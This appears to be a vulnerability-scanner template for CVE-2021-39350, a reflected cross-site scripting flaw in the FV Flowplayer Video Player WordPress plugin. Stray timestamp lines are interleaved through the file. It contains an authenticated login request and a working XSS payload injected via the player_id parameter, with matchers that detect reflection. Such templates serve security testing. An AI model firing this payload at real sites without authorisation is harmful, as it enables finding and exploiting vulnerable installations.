2022-01-25 08:31:13 +00:00
id : CVE-2021-39350
info :
2022-01-25 11:38:01 +00:00
name : FV Flowplayer Video Player WordPress plugin - Authenticated Reflected XSS
2022-01-25 08:31:13 +00:00
author : gy741
severity : medium
description : The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.
reference :
- https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
- https://nvd.nist.gov/vuln/detail/CVE-2021-39350
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.10
cve-id : CVE-2021-39350
cwe-id : CWE-79
2022-01-25 11:38:01 +00:00
tags : cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
2022-01-25 08:31:13 +00:00
requests :
2022-01-25 11:38:01 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
2022-01-25 08:31:13 +00:00
2022-01-25 11:38:01 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
2022-01-25 08:31:13 +00:00
matchers :
- type : word
part : body
2022-01-25 11:38:01 +00:00
words :
- "</script><script>alert(document.domain)</script>"
- type : word
part : header
words :
- text/html
- type : status
status :
- 200